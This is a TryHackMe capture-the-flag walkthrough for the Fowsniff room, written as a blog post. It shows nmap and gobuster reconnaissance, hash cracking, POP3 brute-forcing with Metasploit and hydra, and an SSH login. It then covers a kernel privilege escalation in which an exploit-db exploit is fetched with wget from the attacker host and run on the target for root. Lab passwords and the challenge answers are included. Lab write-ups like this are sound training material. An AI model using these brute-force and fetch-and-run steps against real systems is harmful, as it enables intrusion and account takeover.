Fowsniff CTF — Walkthrough-TryHackMe
Visit https://tryhackme.com/room/ctf and join the room.
VPN: 10.9.227.16
Attacker IP: 10.10.89.175 / 10.10.193.216
Table of Contents:
Port scanning and IP discovery.
Hitting on port 80
Finding hashes on Pastebin
Decoding hashes
Brute force pop3 login
Connecting to pop3
Finding SSH username and password
Finding privilege escalation vectors
Exploiting Misconfiguration in system
Getting root access.
Reading the flags.
Reconnaissance
nmap -Pn -A 10.10.89.175
The NMAP output shows us that there are 4 ports open: 22(SSH), 80(HTTP), 110(POP3), 143(IMAP)
We find that port 80 is running http, so we open the IP in our browser.
Let us see the source of the page.
I didn’t found any helpful info.
Let us bruteforce using gobuster,dirb or nikto scan
gobuster dir -u http://10.10.89.175 -w /usr/share/dirb/wordlists/common.txt
We don’t find anything on the webpage. gobuster also didn’t reveal anything.
Some information I read in the URL.
After reading this text, I saw that this system is suffering from a data breach. There is a strong possibility that employee information may be exposed on the Internet by hackers. So we googled “fowsniff corp” and found a Pastebin link that contained username and passwords.
Finally, we found some interesting information. In the above screenshot, we can see some email IDs and password hashes from the POP3 service. And we already know from Step 2 that the POP3 port was open. So, this information is beneficial for us.
But these are the hashes of the passwords. We need to find out the passwords. In the next step, let’s try to crack these passwords by using online password-cracking tools.
So far, we have the password hashes of the POP3 users. Now let’s try to crack it. We’ll be using the CrackStation online password-cracking application, which takes hash passwords as input and tries to crack them. It’s simple: we have to copy-paste the hashes and click on “Crack Hash,” and it gives you the plain text password if successfully cracked.
We cracked the hashes use on this site and find passwords to the respective email addresses. But only 8 hashes were cracked, and there are 9 usernames.
Now we have the POP3 service running on the target machine and the usernames and passwords. In the next step, we will try to log in with the credentials.
Now we need to check whether these credentials are correct or not. We can prevent this manually in the current scenario because there are only nine usernames and passwords. But if there were hundreds of credentials, we would need a tool for it, so let’s use a tool for this.
For this, we’ll copy the username and password in two separate files. I created two files, userfow.txt and passfow.txt, and copy-pasted the identified credentials.
Using the usernames and passwords you captured, can you use Metasploit to brute force the pop3 login?
Here I started Metasploit with
msfconsole
and used
search pop3
Let’s use the first entry called “POP3 Login Utility” with:
Use 0
To see what I can do with this, I entered:
show options
One option I had to set is RHOSTS to tell the module who the victim is:
set rhosts 10.10.89.175
I made a text file with all the usernames and passwords in one. Here I used:
set user_file userfow.txt
set pass_file passfow.txt
set verbose false
run
After creating two separate files for username and password. I used the hydra tool for checking the credentials. It can be seen in the screenshot given below. Any of the below commands can be used.
hydra -L userfow.txt -P passfow.txt pop3://10.10.193.216
hydra pop3://10.10.193.216 -L userfow.txt -P passfow.txt
We can see that there is a user named seina who has not changed his password ’til now. We can use these credentials to log into the POP3 service.
Many POP clients can be used to connect with POP, but based on the hint. I prefer to use NetCut for the same. It can be seen in the following screenshot.
Command Used:
nc 10.10.193.216 110
USER seina
PASS scoobydoo2
LIST
In the above screenshot, we can see that first, we used the nc 192.168.1.103 110 commands to connect with the POP3 service. After that, I used USER seina to enter the username for the POP3 service and PASS scoobydoo2 to supply the password for login.
After that, we can see in the output that we are successfully authenticated in the POP3 service. I used the LIST command to see the messages available for that user. There are two messages in this account.
In this step, we use the RETR 1 command to retrieve the message. It can be seen in the following screenshot.
Command Used: RETR 1
I found an SSH temporary password by reading this email, which can be seen in the highlighted area of the above screenshot. The password is given below.
SSH Temporary Password: “S1ck3nBluff+secureshell”
Now, we have one SSH temporary password. Since the SSH port was found open in Step 2, let’s try to log in with this password. But there is one problem: we don’t have the username. We retrieved the second message and found a message that hints that it uses the username “baksteen.”
RETR 2
We use the credentials “baksteen: S1ck3nBluff+secureshell” to log in through SSH.
After the login, we can see the $ sign, which indicates that this is not a root user. This means we need to spend some more time with this CTF because the target of this CTF is to take root access. I ran the uname –a command, which gives information about the kernel.
After getting the shell, I came to know that I have logged in as a normal user. To get the root flag, We must be the root user in this machine. Let’s not wait any longer.
From the output of the above command, we found that it is running on Ubuntu, and the kernel version is 4.4.0.116-generic.
Privilege Escalation
From our low-privileged user shell, we can enumerate the system further. Our user does not have any sudo privileges, and we cannot access any of the other user’s home directories.
In our earlier enumeration process, I found that the machine is of the old version of Ubuntu, so I search for the exploit for the same from exploit-db
After that, I opened the ExploitDB URL and copied the download URL.
After that, I used the wget utility to download the exploit on the attacker’s machine. Once the exploit was downloaded, I renamed it using the mv command and used the gcc compiler to compile it. Once the compiling process was completed, an exploit file was generated.
Commands Used:
cd /var/www/html/
wget https://www.exploit-db.com/download/44298
mv 44298 44298.c
gcc 44298.c -o exploit
/etc/init.d/apache2 start
ifconfig
When the exploit has successfully complied, I started the apache2 service to transfer this exploit to the target machine.
I changed my current directory to the tmp directory on the target machine and downloaded the exploit by using the wget utility. After that, I provided executable permission by using the chmod command. After that, I ran the exploit, which gave the root access of the target machine. All the commands and their output can be seen highlighted in the following screenshot.
Commands Used:
cd /tmp/
wget 10.9.227.16/exploit
chmod +x exploit
./exploit
Now we have root access to the target machine. Let’s find the flag and complete the CTF.
I read the flag file in the tmp directory by using the cat command. The flag can be seen in the following screenshot.
Done!!!!!! Let us see the answers to the challenge questions now.
What was seina’s password to the email service?
scoobydoo2
Looking through her emails, what was a temporary password set for her?
S1ck3nBluff+secureshell
Thank you very much for reading. As I always mention in every blog, suggestions are always welcome and open for discussion to discuss other methods to complete the same task. I hope you find this is useful, and if there is something you would like to add or any suggestions, you can contact me anytime..”
